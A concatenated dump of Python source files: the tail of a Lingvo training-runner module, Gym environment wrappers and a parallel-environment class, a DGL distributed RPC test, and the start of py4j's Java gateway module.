if FLAGS.job == 'trainer_client':
FLAGS.tf_master = 'grpc://%s' % cluster_spec_dict['worker'][FLAGS.task]
for job in cluster_spec_dict.keys():
if job.startswith('decoder_'):
assert len(job_specs) == 1, 'Decoder jobs must run on their own'
assert ',' not in job_specs[0], 'Only single machine supported'
FLAGS.decoder_job = '/job:%s' % job
FLAGS.decoder_replicas = 1
if job.startswith('evaler_'):
assert len(job_specs) == 1, 'Evaler jobs must run on their own'
assert ',' not in job_specs[0], 'Only single machine supported'
FLAGS.evaler_job = '/job:%s' % job
FLAGS.evaler_replicas = 1
if FLAGS.mode == 'sync' and FLAGS.job in ('controller', 'trainer_client',
'worker'):
FLAGS.worker_job = '/job:worker'
FLAGS.worker_replicas = len(cluster_spec_dict['worker'])
FLAGS.ps_job = '/job:worker'
FLAGS.ps_replicas = FLAGS.worker_replicas
if FLAGS.mode == 'async' and FLAGS.job in ('controller', 'trainer', 'ps'):
FLAGS.worker_job = '/job:trainer'
FLAGS.worker_replicas = len(cluster_spec_dict['trainer'])
FLAGS.ps_job = '/job:ps'
FLAGS.ps_replicas = len(cluster_spec_dict['ps'])
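  # Illustrative cluster_spec (hosts and ports hypothetical):
  #   --cluster_spec='trainer=10.0.0.1:2222,10.0.0.2:2222@ps=10.0.0.3:2223'
  # With --mode=async and --job=trainer, the code above sets
  # worker_replicas=2 and ps_replicas=1.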
def UpdateClusterParamsFromFlags(self, cfg, job_name):
"""Update `cfg` with a training cluster configuration from flags."""
cfg.cluster.mode = FLAGS.mode
cfg.cluster.job = job_name
cfg.cluster.task = FLAGS.task
cfg.cluster.controller.name = FLAGS.controller_job
cfg.cluster.controller.gpus_per_replica = FLAGS.controller_gpus
cfg.cluster.worker.name = FLAGS.worker_job
cfg.cluster.worker.replicas = FLAGS.worker_replicas
cfg.cluster.worker.gpus_per_replica = FLAGS.worker_gpus
cfg.cluster.worker.tpus_per_replica = FLAGS.worker_tpus
cfg.cluster.worker.num_tpu_hosts = FLAGS.worker_num_tpu_hosts
cfg.cluster.worker.devices_per_split = FLAGS.worker_split_size
cfg.cluster.ps.name = FLAGS.ps_job
cfg.cluster.ps.replicas = FLAGS.ps_replicas
cfg.cluster.ps.gpus_per_replica = FLAGS.ps_gpus
cfg.cluster.input.name = FLAGS.input_job
cfg.cluster.input.replicas = FLAGS.input_replicas
cfg.cluster.evaler.name = FLAGS.evaler_job
cfg.cluster.evaler.replicas = FLAGS.evaler_replicas
cfg.cluster.evaler.gpus_per_replica = FLAGS.evaler_gpus
cfg.cluster.decoder.name = FLAGS.decoder_job
cfg.cluster.decoder.replicas = FLAGS.decoder_replicas
cfg.cluster.decoder.gpus_per_replica = FLAGS.decoder_gpus
def _CreateRunner(self, job, model_task_name, logdir, tf_master, trial):
"""Create a runner."""
evaler_job_name_prefix = 'evaler_'
decoder_job_name_prefix = 'decoder_'
tf.logging.info('Job %s start', job)
common_args = (model_task_name, logdir, tf_master, trial)
if job == 'controller':
cfg = self.GetParamsForDataset('controller', 'Train')
return self.Controller(cfg, *common_args)
elif job == 'trainer':
cfg = self.GetParamsForDataset('trainer', 'Train')
return self.Trainer(cfg, *common_args)
elif job == 'trainer_client':
cfg = self.GetParamsForDataset('trainer_client', 'Train')
if py_utils.use_tpu():
return self.TrainerTpu(cfg, *common_args)
else:
return self.Trainer(cfg, *common_args)
elif job.startswith(evaler_job_name_prefix):
dataset_name = job[len(evaler_job_name_prefix):]
cfg = self.GetParamsForDataset('evaler', dataset_name)
return self.Evaler(dataset_name.lower(), cfg, *common_args)
elif job.startswith(decoder_job_name_prefix):
dataset_name = job[len(decoder_job_name_prefix):]
cfg = self.GetParamsForDataset('decoder', dataset_name)
return self.Decoder(dataset_name.lower(), cfg, *common_args)
elif job in ('ps', 'worker', 'input'):
self._tf_server.join()
else:
raise ValueError('job %s is not supported' % job)
def CreateRunners(self, jobs, logdir, trial=base_trial.NoOpTrial()):
"""Creates a list of runners based on `FLAGS.mode`.
Args:
jobs: a list of runner jobs.
logdir: the directory used for logging, usually on CNS.
trial: optional `Trial` object, used for reporting measures and early
stopping.
Returns:
A list of `.BaseRunner`, one per job in `jobs`.
"""
runners = []
for j in jobs:
tf_master = FLAGS.tf_master
# Ensure that decoder or evaler threads do not clobber variables being
# updated by trainer by forcing them to use independent sessions.
if ('trainer' in jobs and
(j.startswith('decoder') or j.startswith('evaler'))):
tf_master = ''
runner = self._CreateRunner(j, FLAGS.model_task_name, logdir, tf_master,
trial)
runners.append(runner)
return runners
def StartRunners(self, runners):
"""Runs `runners` in parallel threads.
Returns when all of them finish.
Args:
runners: a list of `.BaseRunner`.
Returns:
None.
"""
threads = []
tf.logging.info('Starting runners')
for runner in runners:
t = threading.Thread(target=runner.Start)
t.daemon = True
t.start()
threads.append(t)
tf.logging.info('Total num runner.enqueue_ops: %d',
len(runner.enqueue_ops))
for enqueue_op in runner.enqueue_ops:
def StartEnqueue(runner, op):
tf.logging.info('Starting enqueue op %s', op.name)
return lambda: runner.StartEnqueueOp(op)
tq = threading.Thread(target=StartEnqueue(runner, enqueue_op))
tq.start()
threads.append(tq)
tf.logging.info('Waiting for runners to finish...')
for t in threads:
while True:
t.join(1)
        if not t.is_alive():
break
tf.logging.info('All runners done.')
def RunTrial(self, job, logdir, trial):
"""A wrapper function for running a trial."""
if job == 'all':
# For async mode: Run controller, trainer, evaler jobs in one process,
# multiple threads.
self.StartRunners(
self.CreateRunners(['controller', 'trainer'], logdir, trial))
evaler = self._CreateRunner('evaler_dev', FLAGS.model_task_name, logdir,
FLAGS.tf_master, trial)
evaler.EvalLatestCheckpoint()
elif job == 'all_sync':
# For sync mode: Run controller, trainer_client, evaler jobs in one
# process, multiple threads.
self.StartRunners(
self.CreateRunners(['controller', 'trainer_client'], logdir, trial))
evaler = self._CreateRunner('evaler_dev', FLAGS.model_task_name, logdir,
FLAGS.tf_master, trial)
evaler.EvalLatestCheckpoint()
else:
# Run each job in separate process/task
# TODO(rpang): add support for running evaler_test and decoder.
self.StartRunners(self.CreateRunners([job], logdir, trial))
def MaybeConfigRunLocally(self):
"""Update flags if configured to run locally."""
if not FLAGS.run_locally:
# Do nothing
return
FLAGS.tf_master = tf.train.Server.create_local_server().target
if not FLAGS.mode:
FLAGS.mode = 'sync'
if not FLAGS.job:
if FLAGS.run_locally == 'tpu':
FLAGS.job = 'trainer_client'
else:
FLAGS.job = 'controller,trainer_client'
FLAGS.task = 0
FLAGS.controller_job = '/job:local'
FLAGS.worker_job = '/job:local'
FLAGS.worker_replicas = 1
if FLAGS.run_locally == 'gpu':
if not FLAGS.worker_gpus:
FLAGS.worker_gpus = 1
else:
FLAGS.worker_gpus = 0
if FLAGS.run_locally == 'tpu':
FLAGS.xla_device = 'tpu'
FLAGS.enable_asserts = False
else:
FLAGS.worker_tpus = 0
if not FLAGS.worker_split_size:
FLAGS.worker_split_size = 1
FLAGS.ps_job = '/job:local'
FLAGS.ps_replicas = 1
FLAGS.ps_gpus = 0
FLAGS.input_job = '/job:local'
FLAGS.input_replicas = 0
FLAGS.evaler_job = '/job:local'
FLAGS.evaler_replicas = 1
if FLAGS.run_locally == 'gpu':
FLAGS.evaler_gpus = 1
else:
FLAGS.evaler_gpus = 0
FLAGS.decoder_job = '/job:local'
FLAGS.decoder_replicas = 1
if FLAGS.run_locally == 'gpu':
FLAGS.decoder_gpus = 1
else:
FLAGS.decoder_gpus = 0
def InspectModel(self):
"""Prints out model analysis for the model."""
p = self.GetParamsForDataset('controller', 'Train')
p.cluster.mode = 'sync'
c = cluster_factory.Cluster(p.cluster)
with tf.Graph().as_default(), c, tf.device(c.GetPlacer()):
analysis, _ = _ModelAnalysis(p.cls(p))
print(analysis)
def InspectDatasets(self):
"""Prints out datasets configured for the model."""
cls = self.model_registry.GetClass(self._model_name)
datasets = []
for name, _ in inspect.getmembers(cls, inspect.ismethod):
if name not in ['GetDatasetParams', 'Model', 'Task'
] and not name.startswith('_'):
datasets += [name]
print(','.join([_.lower() for _ in datasets]))
def InspectDecoder(self):
"""Prints out datasets configured for the decoder."""
cls = self.model_registry.GetClass(self._model_name)
has_decoder = False
if issubclass(cls, base_model_params.SingleTaskModelParams):
has_decoder = cls.Task(
).cls.CreateDecoderMetrics != base_model.BaseTask.CreateDecoderMetrics
else:
for _, task_param in cls.Model().task_params.IterParams():
has_decoder |= (
task_param.cls.CreateDecoderMetrics !=
base_model.BaseTask.CreateDecoderMetrics)
if has_decoder:
# We assume that the proper decoder is implemented.
self.InspectDatasets()
else:
print('')
def WriteInferenceGraph(self):
"""Generates the inference graphs for a given model."""
inference_graph_dir = os.path.join(FLAGS.logdir, 'inference_graphs')
tf.gfile.MakeDirs(inference_graph_dir)
tf.logging.info('Writing inference graphs to dir: %s', inference_graph_dir)
cfg = self.model_registry.GetParams(self._model_name, 'Test')
if (issubclass(cfg.cls, base_model.MultiTaskModel) and
not FLAGS.model_task_name):
tf.logging.info('Cannot write inference graphs for multi-task model '
'when model_task_name is not specified.')
return
try:
filename_prefix = 'inference'
if FLAGS.model_task_name:
filename_prefix = '%s_inference' % FLAGS.model_task_name
filename_prefix = os.path.join(inference_graph_dir, filename_prefix)
# Standard inference graph.
self.inference_graph_exporter.InferenceGraphExporter.Export(
model_cfg=cfg,
model_task_name=FLAGS.model_task_name,
export_path=filename_prefix + '.pbtxt')
# TPU inference graph.
self.inference_graph_exporter.InferenceGraphExporter.Export(
model_cfg=cfg,
model_task_name=FLAGS.model_task_name,
device_options=self.inference_graph_exporter.InferenceDeviceOptions(
device='tpu',
retain_device_placement=False,
var_options='ON_DEVICE',
gen_init_op=True,
dtype_override=None),
export_path=filename_prefix + '_tpu.pbtxt')
except NotImplementedError as e:
tf.logging.error('Cannot write inference graph: %s', e)
def Start(self):
"""Start the process."""
tf.logging.set_verbosity(tf.logging.INFO)
assert self.model_registry.GetClass(
self._model_name), ('Model %s is not found.' % FLAGS.model)
if FLAGS.mode == 'inspect_model':
self.InspectModel()
return
if FLAGS.mode == 'inspect_evaler':
self.InspectDatasets()
return
if FLAGS.mode == 'inspect_decoder':
self.InspectDecoder()
return
if FLAGS.mode == 'write_inference_graph':
self.WriteInferenceGraph()
return
assert FLAGS.mode in ['sync', 'async']
if FLAGS.mode == 'shell':
_StartShell(locals())
return
self.MaybeConfigRunLocally()
self.MaybeConfigRunDistributed()
self.MaybeLaunchTensorFlow()
self.StartRunners(self.CreateRunners(FLAGS.job.split(','), FLAGS.logdir))
def main(unused_argv):
# pylint: disable=g-import-not-at-top
# pylint: disable=unused-variable
from lingvo import model_imports
RunnerManager(FLAGS.model).Start()
if __name__ == '__main__':
tf.app.run(main)
|
env_utils.py
|
import gym
import numpy as np
from gym.spaces import Discrete, Box
from gym.core import Env
from multiprocessing import Process, Pipe
from yarlp.utils.atari_wrappers import wrap_deepmind
from yarlp.utils.atari_wrappers import NoopResetEnv, MaxAndSkipEnv
def wrap_atari(env):
assert 'NoFrameskip' in env.spec.id,\
"{} is not an atari env".format(env)
env = MonitorEnv(env)
env = NoopResetEnv(env, noop_max=30)
env = MaxAndSkipEnv(env, skip=4)
env = wrap_deepmind(env, frame_stack=True, clip_rewards=True, scale=False)
return env
class MonitorEnv(gym.Wrapper):
def __init__(self, env=None):
"""
"""
super().__init__(env)
self._current_reward = None
self._num_steps = None
self._total_steps = None
self._episode_rewards = []
self._episode_lengths = []
self._num_episodes = 0
def reset(self, **kwargs):
obs = self.env.reset(**kwargs)
if self._total_steps is None:
self._total_steps = sum(self._episode_lengths)
if self._current_reward is not None:
self._episode_rewards.append(self._current_reward)
self._episode_lengths.append(self._num_steps)
self._num_episodes += 1
self._current_reward = 0
self._num_steps = 0
return obs
def step(self, action):
obs, rew, done, info = self.env.step(action)
self._current_reward += rew
self._num_steps += 1
self._total_steps += 1
return (obs, rew, done, info)
def get_episode_rewards(self):
return self._episode_rewards
def get_episode_lengths(self):
return self._episode_lengths
def get_total_steps(self):
return self._total_steps
class CappedCubicVideoSchedule(object):
def __call__(self, count):
if count < 1000:
return int(round(count ** (1. / 3))) ** 3 == count
else:
return count % 1000 == 0
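# The schedule above records video at perfect-cube episode counts
# (0, 1, 8, 27, ..., 729) and at every 1000th episode thereafter.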
class NoVideoSchedule(object):
def __call__(self, count):
return False
class GymEnv(Env):
"""
Taken from rllab gym_env.py
"""
def __init__(self, env_name, video=False,
log_dir=None,
force_reset=False,
is_atari=False,
*args, **kwargs):
self.env = env = gym.envs.make(env_name)
self._original_env = env
if is_atari:
self.env = wrap_atari(env)
# from yarlp.utils.wrap_atari import wrap_deepmind, wrap_deepmind2
# self.env = wrap_deepmind2(env_name)
else:
self.env = MonitorEnv(env)
assert isinstance(video, bool)
if log_dir is None:
self.monitoring = False
else:
if not video:
video_schedule = NoVideoSchedule()
else:
video_schedule = CappedCubicVideoSchedule()
self.env = gym.wrappers.Monitor(
self.env, log_dir, video_callable=video_schedule,
force=True)
self.monitoring = True
self.env_id = env.spec.id
self._log_dir = log_dir
self._force_reset = force_reset
@property
def action_space(self):
return self.env.action_space
@staticmethod
def env_action_space_is_discrete(env):
if isinstance(env.action_space, Discrete):
return True
elif isinstance(env.action_space, Box):
return False
else:
            raise NotImplementedError('Unknown base environment: {}'.format(env))
@staticmethod
def get_env_action_space_dim(env):
if GymEnv.env_action_space_is_discrete(env):
return env.action_space.n
return env.action_space.shape[0]
@property
def observation_space(self):
return self.env.observation_space
def reset(self):
if self._force_reset and self.monitoring:
assert isinstance(self.env, gym.wrappers.Monitor)
recorder = self.env.stats_recorder
if recorder is not None:
recorder.done = True
return self.env.reset()
def step(self, action):
return self.env.step(action)
def render(self, *args, **kwargs):
self.env.render(*args, **kwargs)
def close(self):
self._original_env.close()
def seed(self, i=None):
return self.env.seed(i)
@property
def spec(self):
return self.env.spec
def __str__(self):
return "GymEnv: %s" % self.env
@property
def unwrapped(self):
return self.env.unwrapped
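# Illustrative use of GymEnv (environment id hypothetical):
#   env = GymEnv("CartPole-v1")
#   ob = env.reset()
#   ob, rew, done, info = env.step(env.action_space.sample())
#   env.close()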
class NormalizedGymEnv(GymEnv):
"""
Taken from rllab normalized_env.py
"""
def __init__(self, env_name,
video=False,
log_dir=None,
force_reset=False,
scale_reward=1.,
min_reward_std=1e-2,
min_obs_std=1e-2,
norm_obs_clip=5,
normalize_obs=False,
normalize_rewards=False,
scale_continuous_actions=False,
is_atari=False,
*args, **kwargs):
super().__init__(env_name=env_name, video=video,
log_dir=log_dir, force_reset=force_reset,
is_atari=is_atari, *args, **kwargs)
self._scale_reward = scale_reward
self._normalize_obs = normalize_obs
self._normalize_rewards = normalize_rewards
self._scale_continuous_actions = scale_continuous_actions
self.is_atari = is_atari
if normalize_obs is True:
assert is_atari is False,\
"normalize_obs must be False if is_atari is True"
self._obs_rms = RunningMeanStd(
shape=(self.env.observation_space.shape),
min_std=min_obs_std, clip_val=norm_obs_clip)
if normalize_rewards is True:
            self._reward_rms = RunningMeanStd(
                shape=(1,), min_std=min_reward_std)
@property
def action_space(self):
if isinstance(self.env.action_space, Box):
ub = np.ones(self.env.action_space.shape)
return Box(-1 * ub, ub)
return self.env.action_space
def _update_rewards(self, r, done):
self._reward_rms.cache(r)
r = self._reward_rms.normalize(r)
if done:
self._reward_rms.update()
return r
def _update_obs(self, obs, done):
self._obs_rms.cache(obs)
obs = self._obs_rms.normalize(obs)
if done:
self._obs_rms.update()
return obs
def reset(self):
ob = super().reset()
if self._normalize_obs:
return self._update_obs(ob, False)
return ob
def step(self, action):
if self._scale_continuous_actions:
if isinstance(self.env.action_space, Box):
# rescale the action
lb, ub = self.env.action_space.low, self.env.action_space.high
scaled_action = lb + (action[0] + 1.) * 0.5 * (ub - lb)
scaled_action = np.clip(scaled_action, lb, ub)
action = scaled_action
wrapped_step = self.env.step(action)
next_obs, reward, done, info = wrapped_step
if self._normalize_obs:
next_obs = self._update_obs(next_obs, done)
if self._normalize_rewards:
reward = self._update_rewards(reward, done)
return next_obs, reward * self._scale_reward, done, info
def __str__(self):
return "Normalized GymEnv: %s" % self.env
class RunningMeanStd(object):
"""
RunningMeanStd
"""
def __init__(self, shape, min_std=1e-6, clip_val=None):
self._min_std = min_std
self._clip_val = clip_val
self._cache = []
self._mean = np.zeros(shape)
self._std = np.ones(shape)
self._count = 0.
def normalize(self, x):
xn = (x - self._mean) / self._std
if self._clip_val:
xn = np.clip(xn, -self._clip_val, self._clip_val)
        if np.isscalar(x):
            # np.asscalar is deprecated in newer numpy; .item() is the
            # supported way to extract the Python scalar
            return xn.item()
return xn
def cache(self, x):
self._cache.append(x)
def update(self):
X = np.array(self._cache)
if X.shape[0] <= 1:
# wait for more data to avoid numerical errors in std calc
return
avg_X = np.mean(X, axis=0)
std_X = np.std(X, axis=0, ddof=1)
if self._count == 0:
self._std = np.clip(std_X, self._min_std, None)
self._mean = avg_X
self._count += X.shape[0]
else:
delta = avg_X - self._mean
m_a = np.square(self._std) * (self._count - 1)
m_b = np.square(std_X) * (X.shape[0] - 1)
M2 = m_a + m_b + delta ** 2 * self._count * X.shape[0] /\
(self._count + X.shape[0])
M2 = np.sqrt(M2 / (self._count + X.shape[0] - 1))
self._std = np.clip(M2, self._min_std, None)
self._count += X.shape[0]
self._mean = self._mean + delta * X.shape[0] / self._count
self._cache = []
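def _demo_running_mean_std():
    """Illustrative self-check, not part of the original module: streaming
    two batches through RunningMeanStd should reproduce the mean computed
    over all samples at once (update() above merges batch statistics using
    the parallel mean/variance combination formula)."""
    rms = RunningMeanStd(shape=(3,))
    batch1 = np.random.randn(5, 3)
    batch2 = np.random.randn(7, 3)
    for x in batch1:
        rms.cache(x)
    rms.update()
    for x in batch2:
        rms.cache(x)
    rms.update()
    expected = np.concatenate([batch1, batch2]).mean(axis=0)
    assert np.allclose(rms._mean, expected)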
def get_wrapper_by_name(env, classname):
currentenv = env
while True:
if classname in currentenv.__class__.__name__:
return currentenv
elif hasattr(env, 'env'):
currentenv = currentenv.env
else:
raise ValueError(
'Could not find wrapper named {}'.format(classname))
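# Sketch (illustrative): recover a specific wrapper from a stack of nested
# envs, e.g. to read the episode statistics collected by MonitorEnv:
#   monitor = get_wrapper_by_name(env, 'MonitorEnv')
#   monitor.get_episode_rewards()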
def make_parallel_envs(env_id, num_envs, start_seed, is_atari, **kwargs):
envs = [NormalizedGymEnv(env_id, is_atari=is_atari, **kwargs)
for _ in range(num_envs)]
[envs[i].seed(start_seed + i) for i in range(num_envs)]
return envs
def worker(remote, parent_remote, env):
"""
Taken from OpenAI baselines
"""
parent_remote.close()
while True:
cmd, data = remote.recv()
if cmd == 'step':
ob, reward, done, info = env.step(data)
if done:
ob = env.reset()
remote.send((ob, reward, done, info))
elif cmd == 'reset':
ob = env.reset()
remote.send(ob)
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces':
remote.send((env.observation_space, env.action_space))
elif cmd == 'seed':
remote.send((env.seed(data)))
elif cmd == 'get_episode_rewards':
remote.send(
get_wrapper_by_name(env, 'MonitorEnv').get_episode_rewards())
elif cmd == 'get_total_steps':
remote.send(
get_wrapper_by_name(env, 'MonitorEnv').get_total_steps())
else:
raise NotImplementedError
class ParallelEnvs:
"""
Adapted from OpenAI baselines
"""
def __init__(self, env_id, num_envs, start_seed=1, is_atari=True,
**kwargs):
"""
:param env_id: str, environment id
:param num_envs: int, number of environments
:param start_seed: int, seed for environment, gets incremented by 1
for each additional env
"""
envs = make_parallel_envs(env_id, num_envs,
start_seed, is_atari, **kwargs)
self.envs = envs
self.start_seed = start_seed
self.env_id = env_id
self.waiting = False
self.closed = False
self.num_envs = len(envs)
self.parents, self.children = zip(
*[Pipe() for _ in range(self.num_envs)])
self.ps = [
Process(target=worker, args=(child, parent, env))
for (child, parent, env) in
zip(self.children, self.parents, envs)]
for p in self.ps:
# daemons are killed if parent is killed
p.daemon = True
p.start()
for child in self.children:
child.close()
self.parents[0].send(('get_spaces', None))
observation_space, action_space = self.parents[0].recv()
self.observation_space = observation_space
self.action_space = action_space
self.spec = envs[0].spec
self.is_atari = is_atari
def step_async(self, actions):
for parent, action in zip(self.parents, actions):
parent.send(('step', action))
self.waiting = True
def step_wait(self):
results = [parent.recv() for parent in self.parents]
self.waiting = False
obs, rews, dones, infos = zip(*results)
return np.stack(obs), np.stack(rews), np.stack(dones), infos
def reset(self):
for parent in self.parents:
parent.send(('reset', None))
return np.stack([parent.recv() for parent in self.parents])
def step(self, actions):
self.step_async(actions)
return self.step_wait()
def get_episode_rewards(self, last_n=None):
"""
:param last_n: int, get the last_n rewards per env
"""
for parent in self.parents:
parent.send(('get_episode_rewards', None))
results = [parent.recv() for parent in self.parents]
if last_n:
results = [r[-last_n:] for r in results]
flat_results = []
for r in results:
flat_results.extend(r)
return flat_results
def get_total_steps(self):
for parent in self.parents:
parent.send(('get_total_steps', None))
results = [parent.recv() for parent in self.parents]
return results
def seed(self, i):
for parent in self.parents:
parent.send(('seed', i))
i += 1
return [parent.recv() for parent in self.parents]
def close(self):
if self.closed:
return
if self.waiting:
for parent in self.parents:
parent.recv()
for parent in self.parents:
parent.send(('close', None))
for p in self.ps:
p.join()
self.closed = True
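# Hedged usage sketch (spawns one worker process per env; 'PongNoFrameskip-v4'
# is an assumed Atari id, not taken from this module):
#   envs = ParallelEnvs('PongNoFrameskip-v4', num_envs=4)
#   obs = envs.reset()  # stacked array with leading dimension num_envs
#   actions = [envs.action_space.sample() for _ in range(4)]
#   obs, rews, dones, infos = envs.step(actions)
#   envs.close()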
|
test_rpc.py
|
import os
import time
import socket
import dgl
import backend as F
import unittest, pytest
import multiprocessing as mp
from numpy.testing import assert_array_equal
if os.name != 'nt':
import fcntl
import struct
INTEGER = 2
STR = 'hello world!'
HELLO_SERVICE_ID = 901231
TENSOR = F.zeros((10, 10), F.int64, F.cpu())
def get_local_usable_addr():
"""Get local usable IP and port
Returns
-------
str
        IP address and port separated by a space, e.g., '192.168.8.12 50051'
"""
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
sock.connect(('10.255.255.255', 1))
ip_addr = sock.getsockname()[0]
except ValueError:
ip_addr = '127.0.0.1'
finally:
sock.close()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(("", 0))
sock.listen(1)
port = sock.getsockname()[1]
sock.close()
return ip_addr + ' ' + str(port)
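# Illustrative note: the returned string is space separated, e.g.
# '192.168.8.12 50051', and forms the 'ip port' prefix of the ip_config
# lines written in the tests below.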
def foo(x, y):
assert x == 123
assert y == "abc"
class MyRequest(dgl.distributed.Request):
def __init__(self):
self.x = 123
self.y = "abc"
self.z = F.randn((3, 4))
self.foo = foo
def __getstate__(self):
return self.x, self.y, self.z, self.foo
def __setstate__(self, state):
self.x, self.y, self.z, self.foo = state
def process_request(self, server_state):
pass
class MyResponse(dgl.distributed.Response):
def __init__(self):
self.x = 432
def __getstate__(self):
return self.x
def __setstate__(self, state):
self.x = state
def simple_func(tensor):
return tensor
class HelloResponse(dgl.distributed.Response):
def __init__(self, hello_str, integer, tensor):
self.hello_str = hello_str
self.integer = integer
self.tensor = tensor
def __getstate__(self):
return self.hello_str, self.integer, self.tensor
def __setstate__(self, state):
self.hello_str, self.integer, self.tensor = state
class HelloRequest(dgl.distributed.Request):
def __init__(self, hello_str, integer, tensor, func):
self.hello_str = hello_str
self.integer = integer
self.tensor = tensor
self.func = func
def __getstate__(self):
return self.hello_str, self.integer, self.tensor, self.func
def __setstate__(self, state):
self.hello_str, self.integer, self.tensor, self.func = state
def process_request(self, server_state):
assert self.hello_str == STR
assert self.integer == INTEGER
new_tensor = self.func(self.tensor)
res = HelloResponse(self.hello_str, self.integer, new_tensor)
return res
def start_server(num_clients, ip_config):
print("Sleep 5 seconds to test client re-connect.")
time.sleep(5)
server_state = dgl.distributed.ServerState(None, local_g=None, partition_book=None)
dgl.distributed.register_service(HELLO_SERVICE_ID, HelloRequest, HelloResponse)
dgl.distributed.start_server(server_id=0,
ip_config=ip_config,
num_clients=num_clients,
server_state=server_state)
def start_client(ip_config):
dgl.distributed.register_service(HELLO_SERVICE_ID, HelloRequest, HelloResponse)
dgl.distributed.connect_to_server(ip_config=ip_config)
req = HelloRequest(STR, INTEGER, TENSOR, simple_func)
# test send and recv
dgl.distributed.send_request(0, req)
res = dgl.distributed.recv_response()
assert res.hello_str == STR
assert res.integer == INTEGER
assert_array_equal(F.asnumpy(res.tensor), F.asnumpy(TENSOR))
# test remote_call
target_and_requests = []
for i in range(10):
target_and_requests.append((0, req))
res_list = dgl.distributed.remote_call(target_and_requests)
for res in res_list:
assert res.hello_str == STR
assert res.integer == INTEGER
assert_array_equal(F.asnumpy(res.tensor), F.asnumpy(TENSOR))
# test send_request_to_machine
dgl.distributed.send_request_to_machine(0, req)
res = dgl.distributed.recv_response()
assert res.hello_str == STR
assert res.integer == INTEGER
assert_array_equal(F.asnumpy(res.tensor), F.asnumpy(TENSOR))
# test remote_call_to_machine
target_and_requests = []
for i in range(10):
target_and_requests.append((0, req))
res_list = dgl.distributed.remote_call_to_machine(target_and_requests)
for res in res_list:
assert res.hello_str == STR
assert res.integer == INTEGER
assert_array_equal(F.asnumpy(res.tensor), F.asnumpy(TENSOR))
def test_serialize():
from dgl.distributed.rpc import serialize_to_payload, deserialize_from_payload
SERVICE_ID = 12345
dgl.distributed.register_service(SERVICE_ID, MyRequest, MyResponse)
req = MyRequest()
data, tensors = serialize_to_payload(req)
req1 = deserialize_from_payload(MyRequest, data, tensors)
req1.foo(req1.x, req1.y)
assert req.x == req1.x
assert req.y == req1.y
assert F.array_equal(req.z, req1.z)
res = MyResponse()
data, tensors = serialize_to_payload(res)
res1 = deserialize_from_payload(MyResponse, data, tensors)
assert res.x == res1.x
def test_rpc_msg():
from dgl.distributed.rpc import serialize_to_payload, deserialize_from_payload, RPCMessage
SERVICE_ID = 32452
dgl.distributed.register_service(SERVICE_ID, MyRequest, MyResponse)
req = MyRequest()
data, tensors = serialize_to_payload(req)
rpcmsg = RPCMessage(SERVICE_ID, 23, 0, 1, data, tensors)
assert rpcmsg.service_id == SERVICE_ID
assert rpcmsg.msg_seq == 23
assert rpcmsg.client_id == 0
assert rpcmsg.server_id == 1
assert len(rpcmsg.data) == len(data)
assert len(rpcmsg.tensors) == 1
assert F.array_equal(rpcmsg.tensors[0], req.z)
@unittest.skipIf(os.name == 'nt', reason='Windows is not supported yet')
def test_rpc():
ip_config = open("rpc_ip_config.txt", "w")
ip_addr = get_local_usable_addr()
ip_config.write('%s 1\n' % ip_addr)
ip_config.close()
ctx = mp.get_context('spawn')
pserver = ctx.Process(target=start_server, args=(1, "rpc_ip_config.txt"))
pclient = ctx.Process(target=start_client, args=("rpc_ip_config.txt",))
pserver.start()
time.sleep(1)
pclient.start()
pserver.join()
pclient.join()
@unittest.skipIf(os.name == 'nt', reason='Windows is not supported yet')
def test_multi_client():
ip_config = open("rpc_ip_config_mul_client.txt", "w")
ip_addr = get_local_usable_addr()
ip_config.write('%s 1\n' % ip_addr)
ip_config.close()
ctx = mp.get_context('spawn')
pserver = ctx.Process(target=start_server, args=(10, "rpc_ip_config_mul_client.txt"))
pclient_list = []
for i in range(10):
pclient = ctx.Process(target=start_client, args=("rpc_ip_config_mul_client.txt",))
pclient_list.append(pclient)
pserver.start()
for i in range(10):
pclient_list[i].start()
for i in range(10):
pclient_list[i].join()
pserver.join()
if __name__ == '__main__':
test_serialize()
test_rpc_msg()
test_rpc()
test_multi_client()
|
java_gateway.py
|
# -*- coding: UTF-8 -*-
"""Module to interact with objects in a Java Virtual Machine from a
Python Virtual Machine.
Variables that might clash with the JVM start with an underscore
(Java naming conventions discourage leading underscores, so clashes
are unlikely).
Created on Dec 3, 2009
:author: Barthelemy Dagenais
"""
from __future__ import unicode_literals, absolute_import
from collections import deque
import logging
import os
from pydoc import pager
import select
import socket
import struct
from subprocess import Popen, PIPE
import subprocess
import sys
import traceback
import ctypes
from threading import Thread, RLock
import weakref
import json
from py4j.compat import (
range, hasattr2, basestring, CompatThread, Queue)
from py4j.finalizer import ThreadSafeFinalizer
from py4j import protocol as proto
from py4j.protocol import (
Py4JError, Py4JJavaError, Py4JNetworkError, Py4JThreadCancelledError,
Py4JAuthenticationError,
get_command_part, get_return_value,
register_output_converter, smart_decode, escape_new_line,
is_fatal_error, is_error, unescape_new_line,
get_error_message, compute_exception_message)
from py4j.signals import Signal
from py4j.version import __version__
class NullHandler(logging.Handler):
def emit(self, record):
pass
null_handler = NullHandler()
logging.getLogger("py4j").addHandler(null_handler)
logger = logging.getLogger("py4j.java_gateway")
BUFFER_SIZE = 4096
DEFAULT_ADDRESS = "127.0.0.1"
DEFAULT_PORT = 25333
DEFAULT_PYTHON_PROXY_PORT = 25334
DEFAULT_ACCEPT_TIMEOUT_PLACEHOLDER = "DEFAULT"
DEFAULT_CALLBACK_SERVER_ACCEPT_TIMEOUT = 5
PY4J_SKIP_COLLECTIONS = "PY4J_SKIP_COLLECTIONS"
PY4J_TRUE = {"yes", "y", "t", "true"}
server_connection_stopped = Signal()
"""Signal sent when a Python (Callback) Server connection is stopped.
Will supply the ``connection`` argument, an instance of CallbackConnection.
The sender is the CallbackServer instance.
"""
server_connection_started = Signal()
"""Signal sent when a Python (Callback) Server connection is started.
Will supply the ``connection`` argument, an instance of CallbackConnection.
The sender is the CallbackServer instance.
"""
server_connection_error = Signal()
"""Signal sent when a Python (Callback) Server encounters an error while
waiting for a connection.
Will supply the ``error`` argument, an instance of Exception.
The sender is the CallbackServer instance.
"""
server_started = Signal()
"""Signal sent when a Python (Callback) Server is started
Will supply the ``server`` argument, an instance of CallbackServer
The sender is the CallbackServer instance.
"""
server_stopped = Signal()
"""Signal sent when a Python (Callback) Server is stopped
Will supply the ``server`` argument, an instance of CallbackServer
